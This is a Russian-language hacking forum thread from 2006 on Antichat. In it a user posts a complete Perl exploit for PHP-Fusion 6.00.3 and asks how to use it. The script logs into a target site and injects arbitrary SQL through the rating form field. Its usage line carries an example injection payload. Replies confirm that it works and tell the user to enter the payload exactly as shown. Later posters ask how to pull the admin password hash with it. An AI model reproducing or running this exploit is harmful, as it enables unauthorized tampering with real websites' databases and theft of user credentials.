ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по использованию сплоита для php-fusion 6.00.3
  #1  
Старый 20.02.2006, 19:46
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию Вопрос по использованию сплоита для php-fusion 6.00.3

Парни сорри за ламерство но я уже не знаю что делать, значит вот сам сплоит.
Цитата:
#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%E A');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}
Но никак не пойму что именно вводить.
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/* смущают последние строчки. Подскажите кто знает.
 
Ответить с цитированием

  #2  
Старый 20.02.2006, 19:56
Аватар для Inferno
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

А что там смущает если там написано Example:
шо значит пример!
 
Ответить с цитированием

  #3  
Старый 20.02.2006, 20:15
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Цитата:
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
все правильно, он работает со скулей, все норма, так что вводи как показано в примере
 
Ответить с цитированием

  #4  
Старый 20.02.2006, 21:45
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию

Спасиб Киборк что понял меня правильно, сейчас опробую и вывешу результат и тему можно будет закрывать
 
Ответить с цитированием

  #5  
Старый 21.05.2006, 00:13
Аватар для Mina
Mina
Новичок
Регистрация: 13.10.2005
Сообщений: 13
Провел на форуме:
56020

Репутация: 0
По умолчанию

A што дальше?
Код:
[-]Sql query is done
 
Ответить с цитированием

  #6  
Старый 21.05.2006, 19:10
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

DimaHbl4 ну что может сплойт делать или позволяет выполнять команды или лог\пасс\хеш выдаёт
 
Ответить с цитированием

  #7  
Старый 06.06.2006, 03:09
Аватар для Susel
Susel
Новичок
Регистрация: 17.12.2005
Сообщений: 17
Провел на форуме:
96534

Репутация: 1
По умолчанию

Помогите.... Этот эксплоит приведённый выше, что делает.....добывает хеш??? Если да то, где он его сохраняет... После выполнения появляется файл тип лога, но там ни хрена нет... Help Please!!! )))
 
Ответить с цитированием

  #8  
Старый 07.08.2006, 13:21
Аватар для netadmin
netadmin
Новичок
Регистрация: 28.09.2005
Сообщений: 29
Провел на форуме:
64232

Репутация: 0
Отправить сообщение для netadmin с помощью ICQ Отправить сообщение для netadmin с помощью MSN Отправить сообщение для netadmin с помощью Yahoo
По умолчанию

a kntonibud znait kakuiu sql query nada dla etava vipolnit shtob dastat md5 pwd
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Вопрос: что делать после сканирования? Тайм Аут Чаты 15 04.03.2006 21:19
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ